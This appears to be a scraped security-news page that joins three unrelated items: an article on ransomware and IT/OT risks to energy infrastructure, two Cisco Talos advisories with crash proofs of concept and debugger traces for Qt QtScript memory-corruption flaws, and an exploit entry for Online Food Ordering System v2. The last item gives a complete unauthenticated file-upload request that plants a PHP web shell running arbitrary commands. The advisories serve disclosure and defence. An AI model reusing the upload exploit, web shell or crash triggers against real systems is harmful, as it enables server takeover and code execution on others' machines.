According to John Vestberg, CEO of Clavister, a Swedish company specializing in network security software, "it is now beyond doubt that cybercriminals pose an ever-increasing threat to critical national infrastructure." He adds: "CNI, such as oil and gas, is a prime target for ransomware gangs." He believes energy firms and their suppliers need to take a more proactive, rather than reactive, approach to cybersecurity using predictive analytics and tools like AI (artificial intelligence) and ML (machine learning) technologies.

Camellia Chan, CEO and founder of Flexxon brand X-PHY, agrees: "It's crucial that CNI organizations never take their eyes off the ball," she says. "Good cybersecurity is an ongoing, proactive, intelligent, and self-learning process and embracing emerging tech such as AI as part of a multilayered cybersecurity solution is essential to detect every type of attack and help create a more robust cybersecurity framework."

Nor are the well-organized, often state-sponsored, ransomware gangs the only problem CNI organizations face. Part of the issue is that as industrial organizations (including utilities such as water and energy companies) digitize their environments, they are exposing potential security weaknesses and vulnerabilities to threat actors much more than in the past.

**Integrated IT/OT Networks**

Whereas traditionally security was not viewed as being of critical importance because an organization's OT (operational technology) network was designed to be isolated, and also because it ran proprietary industrial protocols and custom software, this is no longer the case.

As Daniel Trivellato, VP of OT product engineering at Forescout, a cybersecurity automation software company, says: “OT environments have modernized and are no longer air-gapped from IT networks, meaning that they are more exposed and their lack of security measures poses a critical risk." In connecting these two environments, organizations are increasing the threat landscape but not necessarily putting in appropriate measures to mitigate the risk.

According to Trivellato, this hasn't gone "unnoticed by threat actors" with ICS- and OT-specific malware such as Industroyer, Triton, and Incontroller evidence of the increasingly sophisticated capabilities that attackers have begun to deploy in attacking, resulting in many serious incidents. "While most OT devices can't be patched out, there are practices to address the weaknesses such as device visibility and asset management, segmentation, and continuous monitoring of traffic," Trivellato adds.

**Grid Edge Risk**

For Trevor Dearing, director of critical infrastructure solutions at zero-trust segmentation company Illumio, part of the attraction to cybercriminals of attacking energy companies is the potentially high rewards on offer. "Many of the gangs are realizing that if they can prevent the service from being delivered to customers then companies are more likely to pay the ransom than if they are just stealing data," he says.

A further problem, he says, is that energy systems no longer just comprise the traditional grid including power stations and power lines. Instead, what's emerging is what's known as the "grid edge" — decentralized devices such as smart meters as well as solar panels and batteries in people's homes and businesses. Utah-based company sPower, which owns and operates over 150 generators in the US, was believed to be the first renewable energy provider to be hit by a cybersecurity attack in March 2019 when threat actors exploited a known flaw in Cisco firewalls to disrupt communications over a span of about 12 hours.

One way that renewable energy systems are particularly vulnerable to attack is through their inverters. Providing the interface between solar panels and the grid, these are used to convert the DC (direct current) energy generated by the PV (photovoltaic) solar panel into AC (alternating current) electricity provided to the mains. If the inverter's software isn't updated and secure, its data could be intercepted and manipulated in much the same way as previous attacks in Ukraine and the US. Furthermore, an attacker could also embed code in an inverter that could spread malware into the larger power system, creating even more damage.

According to Ali Mehrizi-Sani, associate professor at Virginia Polytechnic Institute and State University and co-author of a 2018 paper assessing the cybersecurity risk of solar PV, hackers can artificially create a malfunction in a PV system to launch cyberattacks to the inverter controls and monitoring system.

"This is a vulnerability that can be, and has been, exploited to attack the power system," he told online publication PV Tech in November 2020. And while currently the potential risk of a cybersecurity attack to solar power networks remains low because the technology hasn't yet reached critical mass, as it becomes more decentralized — with solar panels installed in public places and on top of buildings — managing networks will increasingly rely on robust, cloud-based IoT security.

**Greater Regulation**

One way that governments as well as organizations can ensure the highest levels of CNI protection is with the implementation of standards. For example, Germany put in IT security laws several years ago, making it mandatory for all network providers, operators, and other CNI businesses to ensure they meet the ISO 27001 family of standards for information security management systems (ISMS), while in the UK there are obligations stipulated in the BSI Criticality Ordinance to demonstrate a complete IT security strategy to secure the operation of critical infrastructure.

Similarly in the US, the NERC CIP (North American Electric Reliability Corporation Critical Infrastructure Protection) group of standards govern critical infrastructure of all entities that materially affect the BES (Bulk Electrical System) in North America — though this set of standards only applies to electricity and not to the oil and gas industries. According to Cliff Martin, head of cyber incident response at GRCI Law, a legal, risk, and compliance consultancy firm, staff who are responsible for CNI need to be trained accordingly and understand that their actions can have real consequences. "This means they can't simply copy and paste traditional IT cybersecurity measures over to the IT environment — it just doesn't work like that."

However, Illumio's Dearing says that what's happening is that more and more companies are developing a single strategy for both OT and IT environments. "The key," he says, "is to assume you are going to be breached and plan accordingly. If you segment by separating out all the different bits of your infrastructure, then an attack on one part isn't necessarily going to have a knock-on effect on all the other parts."

The war in Ukraine and attacks on the Nord Stream pipelines have alerted companies to the physical threat posed to energy infrastructure, especially during winter in the northern hemisphere. However, that's not the only concern. Cybersecurity attacks on CNI are increasing, partly because of a growing threat from nation-state actors but also because cybercriminals are realizing that they can make serious money from potentially denying a much-needed service to customers. At the same time, the convergence of OT and IT technologies is providing a potentially much greater attack surface for cybercriminals to target.

Whereas traditionally security has not been seen as a critical consideration for OT, this needs to change with an increased focus on technical solutions such as segmentation and continuous monitoring of network traffic if companies are going to prevent a potentially catastrophic breach to CNI from taking place.

_**—Story by Chris Price**_

_This story first appeared on_ _IFSEC Global__, part of the Informa Network, and a leading provider of news, features, videos, and white papers for the security and fire industry. IFSEC Global covers developments in long-established physical technologies — like video surveillance, access control, intruder/fire alarms, and guarding — and emerging innovations in cybersecurity, drones, smart buildings, home automation, the Internet of Things, and more._

Securing the World's Energy Systems: Where Physical Security and Cybersecurity Must Meet

An integer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an integer overflow during memory allocation, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**SUMMARY**

An integer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an integer overflow during memory allocation, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Qt Project Qt 6.3.2.

**PRODUCT URLS**

Qt - https://www.qt.io/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-190 - Integer Overflow or Wraparound

**DETAILS**

Qt is a popular software suite primarily used to create graphical user interfaces. It also contains a number of supporting libraries which all aim to enable cross-platform application development with a unified programming API.

Qt’s suite of libraries contains support for executing Javascript code through its QtScript engine, which is extensively used in QML. QtScript is historicaly based on WebKit’s JavaScriptCore, but the current codebase bears little resemblance to modern JavaScriptCore engine.

QtScript implementation supports a set of Reflect Javascript APIs and methods such as Reflect.apply(), which contains an integer overflow vulnerability. The vulnerability can be demonstrated with the following PoC Javascript code:

const v1 = [];
const v3 = [];
v3.length = 3900000000;
Reflect.apply(v1.reverse,v1,v3);

In the above code, two arrays are constructed. The second array has its length property set to a large number. Method Refclect.apply takes three arguments. First is the function to be “applied”, second is the object to which the function is to be applied and third is supposed to be an array of potential arguments to the function. In this example, method reverse of an Array object is being applied, with a task to simply reverse the array. The vulnerability is triggered even though method reverse doesn’t expect or use the array v3. The root cause of the vulnerability can be seen in the following source code:

    static CallArgs createListFromArrayLike(Scope &scope, const Object *o)
    {
        int len = o->getLength();                                                                                       [3]
        Value *arguments = scope.alloc(len);                                                                            [4]
    
        for (int i = 0; i < len; ++i) {
            arguments[i] = o->get(i);                                                                                      [5]
            if (scope.hasException())
                return { nullptr, 0 };
        }
        return { arguments, len };
    }
    
        ReturnedValue Reflect::method_apply(const FunctionObject *f, const Value *, const Value *argv, int argc)             [0]
    {
        Scope scope(f);
        if (argc < 3 || !argv[0].isFunctionObject() || !argv[2].isObject())
            return scope.engine->throwTypeError();
    
        const Object *o = static_cast<const Object *>(argv + 2);
        CallArgs arguments = createListFromArrayLike(scope, o);                                                              [1]
        if (scope.hasException())
            return Encode::undefined();
    
        return checkedResult(scope.engine, static_cast<const FunctionObject &>(argv[0]).call(                               [2]
                    &argv[1], arguments.argv, arguments.argc));
    }
    

In the above code quote we can observe the implementation of Reflect.apply method starting at \[0\]. After some sanity checking, the code at \[1\] takes the 3rd argument to apply() and tries to turn it into a list from an array-like object via createListFromArrayLike. Finally, at \[2\], a call to the target function (reverse in our PoC) is made. The core of the issue lies in the createListFromArrayLike function. In it, at \[3\], the length of the array (3900000000 in our PoC) is retrieved and used in an allocation at \[4\]. Note that len is a signed integer. Further, len is again used at \[5\] as a guard in a for loop that tries to copy the elements. The actual integer overflow happens during a call at \[4\], which indirectly leads to the following code:

    QML_NEARLY_ALWAYS_INLINE Value *jsAlloca(int nValues) {
        Value *ptr = jsStackTop;
        jsStackTop = ptr + nValues;
        return ptr;
    }
    

In the above code, to allocate the memory for the list, a number of values is simply added to a pointer. Since pointers are 8 bytes in size, the compiler will implicitly multiply the length by 8 to satisfy pointer arithmetic rules. With a large value for v3.length this can lead to an integer overflow and wraparound during allocation. This integer overflow then leads to further memory corruption. The exact point of integer overflow can be observed in the debugger (do note that most of the above-quoted functions are actually inlined):

    Breakpoint 16, 0x000000000096bfbb in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) x/10i $pc
    => 0x96bfbb <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+203>:    mov    rdi,QWORD PTR [r13+0x8]                      [6]
       0x96bfbf <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+207>:    movsxd rax,ebp
       0x96bfc2 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+210>:    lea    rcx,[rdi+rax*8]
       0x96bfc6 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+214>:    mov    QWORD PTR [r13+0x8],rcx
       0x96bfca <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+218>:    test   eax,eax
       0x96bfcc <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+220>:    mov    QWORD PTR [rsp],rdi
       0x96bfd0 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+224>:
        jle    0x96c072 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+386>
       0x96bfd6 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+230>:    mov    QWORD PTR [rsp+0x8],rbp
       0x96bfdb <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+235>:    mov    ebp,ebp
       0x96bfdd <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+237>:    lea    rdx,[rbp*8+0x0]
    (gdb) i r ebp
    ebp            0xe8754700          -394967296                                                                                                                              [7]
    (gdb) stepi
    0x000000000096bfbf in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) stepi
    0x000000000096bfc2 in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) x/i $pc
    => 0x96bfc2 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+210>:    lea    rcx,[rdi+rax*8]                            [8]
    (gdb) i r rax
    rax            0xffffffffe8754700  -394967296
    (gdb) i r rdi
    rdi            0x7ffff4e845a0      140737302250912
    (gdb) stepi
    0x000000000096bfc6 in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) i r rcx
    rcx            0x7fff38927da0      140734142512544
        (gdb) x/x $rcx                                                                                                           [9]
    0x7fff38927da0: Cannot access memory at address 0x7fff38927da0
    (gdb)
    

A breakpoint was set at \[6\] just before the pointer arithemtic. Observe that value of length is in 4 byte ebp register at \[7\]. The instruction at \[8\] actually calculates the new pointer by multiplying rax (sign extended length value from ebp) by the size of a pointer and adding it to rdi before storing it into rcx. The command at \[9\] shows that rcx now points to invalid memory. Any further operation using this pointer of length will result in additional memory corruption. Continuing execution finally leads to a following crash:

    (gdb) c
    Continuing.
    
    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000da87d9 in QV4::ArrayPrototype::method_reverse(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) c
    Continuing.
    UndefinedBehaviorSanitizer:DEADLYSIGNAL
    ==370803==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fff38927da0 (pc 0x000000da87d9 bp 0x7ffff48d1d20 sp 0x7fffffffd2c0 T370803)
    ==370803==The signal is caused by a WRITE memory access.
    [Detaching after fork from child process 370824]
        #0 0xda87d9 in QV4::ArrayPrototype::method_reverse(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0xda87d9)
        #1 0x96c0de in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x96c0de)
        #2 0x985e7e in QV4::Runtime::CallProperty::call(QV4::ExecutionEngine*, QV4::Value const&, int, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x985e7e)
        #3 0x9d7bc5 in QV4::Moth::VME::interpret(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*, char const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d7bc5)
        #4 0x9d5bbc in QV4::Moth::VME::exec(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d5bbc)
        #5 0x8e4a77 in QV4::Function::call(QV4::Value const*, QV4::Value const*, int, QV4::ExecutionContext*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8e4a77)
        #6 0x98f487 in QV4::Script::run(QV4::Value const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x98f487)
        #7 0x8779ae in QJSEngine::evaluate(QString const&, QString const&, int, QList<QString>*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8779ae)
        #8 0x428dd6 in main /home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/main.cpp:106:32
        #9 0x7ffff5a9e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #10 0x4123cd in _start (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x4123cd)
    

The above crash is inside method_reverse which is the implementation of Array.reverse. However, the same vulnerability can be triggered through any target function supplied to Reflect.apply. Since the Javascript execution environment presents many ways of precisely manipulating memory layout, this vulnerability could be abused to cause further memory corruption, which can ultimately result in arbitrary code execution.

**TIMELINE**

2022-09-27 - Initial Vendor Contact  
2022-10-11 - Vendor Disclosure  
2023-01-12 - Public Release

Emma Reuter and Theo Morales of Cisco ASIG.

CVE-2022-40983: TALOS-2022-1617 || Cisco Talos Intelligence Group

A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**SUMMARY**

A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Qt Project Qt 6.4

**PRODUCT URLS**

Qt - https://www.qt.io/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Qt is a popular software suite primarily used to create graphical user interfaces. It also contains a number of supporting libraries which all aim to enable cross-platform application development with a unified programming API.

Qt’s suite of libraries contains support for executing Javascript code through its QtScript engine, which is extensively used in QML. QtScript is historically based on WebKit’s JavaScriptCore, but the current codebase bears little resemblance to modern JavaScriptCore engine.

QtScript implementation supports a Javascript argument spreading syntax via use of ... operator, where an array is spread into a list of arguments for a function call. QtScript’s implementation of argument spreading is vulnerable to a heap overflow. The vulnerability can be demonstrated with the following PoC Javascript code:

    var a = [] 
    a.length =  555840;
    Math.max(...a)
    

In the above code, a simple array is constructed and its length set to a large value. This array is then used in a function call with a spreading ... operator, which invokes spreading code in QtScript’s runtime:

    static CallArgs createSpreadArguments(Scope &scope, Value *argv, int argc)
    {
        ScopedValue it(scope);
        ScopedValue done(scope);
    
        int argCount = 0;
    
        Value *v = scope.alloc<Scope::Uninitialized>();                        [1]
        Value *arguments = v;                                                  [2]
        for (int i = 0; i < argc; ++i) {
            if (!argv[i].isEmpty()) {
                *v = argv[i];
                ++argCount;
                v = scope.alloc<Scope::Uninitialized>();
                continue;
            }
            // spread element
            ++i;
            it = Runtime::GetIterator::call(scope.engine, argv[i], /* ForInIterator */ 1);              [3]
            if (scope.hasException())
                return { nullptr, 0 };
            while (1) {
                done = Runtime::IteratorNext::call(scope.engine, it, v);                              [4]
                if (scope.hasException())
                    return { nullptr, 0 };
                Q_ASSERT(done->isBoolean());
                if (done->booleanValue())
                    break;
                ++argCount;                                                                       [5]
                v = scope.alloc<Scope::Uninitialized>();                                          [6]
            }
        }
        return { arguments, argCount };
    }
    

Above code implements the function that turns an array into a list of arguments to be passed into a function call. At \[1\] and \[2\] scoped allocation for arguments is made. At \[3\] an iterator through the input arguments is created and is then used at \[4\] inside an infinite while loop as long as there are elements. With each iteration, argCount is incremented at \[5\] and space for a new value is allocated at \[6\]. Allocation is performed via call to scope.alloc with no parameters, which ends up in the following code:

    QML_NEARLY_ALWAYS_INLINE Value *alloc() const
    {
        Value *ptr = engine->jsAlloca(1);
        switch (mode) {
        case Undefined:
            *ptr = Value::undefinedValue();
            break;
        case Empty:
            *ptr = Value::emptyValue();
            break;
        case Uninitialized:
            break;
        }
        return ptr;
    }
    

Above code allocates space for one more value on the runtime stack by simply incrementing the pointer, without performing any additional checks for available space. Therefore, in a call to createSpreadArguments, elements can keep being allocated until the buffer overflows into adjacent memory or a guard page is hit. This can result in adjacent memory overwrite. Additionally, since the contents of the sparse array being spread is under control, a precise value being written out of bounds can easily be controlled (empty array entries result in zeros being written into v pointer, where non-zero depends on the type, primitive types being written verbatim).

Since the Javascript execution environment presents many ways of precisely manipulating memory layout, this vulnerability could be abused to cause further memory corruption, which can ultimately result in arbitrary code execution.

**Crash Information**

    ==1198788==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7ffff52c2000 (pc 0x00000091f222 bp 0x00000159db70 sp 0x7fffffffd250 T1198788)
    ==1198788==The signal is caused by a WRITE memory access.
        #0 0x91f222 in QV4::Object::internalPut(QV4::PropertyKey, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x91f222)
        #1 0x91f00d in QV4::Object::internalPut(QV4::PropertyKey, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x91f00d)
        #2 0x8fff92 in QV4::IteratorPrototype::createIterResultObject(QV4::ExecutionEngine*, QV4::Value const&, bool) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8fff92)
        #3 0xda0d8b in QV4::ArrayIteratorPrototype::method_next(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0xda0d8b)
        #4 0x9803ac in QV4::Runtime::IteratorNext::call(QV4::ExecutionEngine*, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9803ac)
        #5 0x986f8e in QV4::createSpreadArguments(QV4::Scope&, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x986f8e)
        #6 0x986cf7 in QV4::Runtime::CallWithSpread::call(QV4::ExecutionEngine*, QV4::Value const&, QV4::Value const&, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x986cf7)
        #7 0x9d8804 in QV4::Moth::VME::interpret(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*, char const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d8804)
        #8 0x9d5bbc in QV4::Moth::VME::exec(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d5bbc)
        #9 0x8e4a77 in QV4::Function::call(QV4::Value const*, QV4::Value const*, int, QV4::ExecutionContext*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8e4a77)
        #10 0x98f487 in QV4::Script::run(QV4::Value const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x98f487)
        #11 0x8779ae in QJSEngine::evaluate(QString const&, QString const&, int, QList<QString>*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8779ae)
        #12 0x428dd6 in main /home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/main.cpp:106:32
        #13 0x7ffff5a9e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #14 0x4123cd in _start (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x4123cd)
    

**TIMELINE**

2022-11-10 - Initial Vendor Contact

2022-11-10 - Vendor Disclosure

2023-01-12 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2022-43591: TALOS-2022-1650 || Cisco Talos Intelligence Group

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/11/2023  
# Exploit Author: Onurcan Alcan  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Macos / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38679779537855109463517942658  
Content-Length: 1225  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=menu  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="id"

1  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="name"

Diet Coke  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="description"

In Can  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="status"

on  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="category_id"

3  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="price"

20  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="img"; filename="revcmd.php"  
Content-Type: text/php

<?  
?>  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
<?  
if($_GET['cmd']) {  
  system($_GET['cmd']);  
  }  
?>  
</pre>  
</BODY></HTML>

-----------------------------38679779537855109463517942658--

Tag

#intel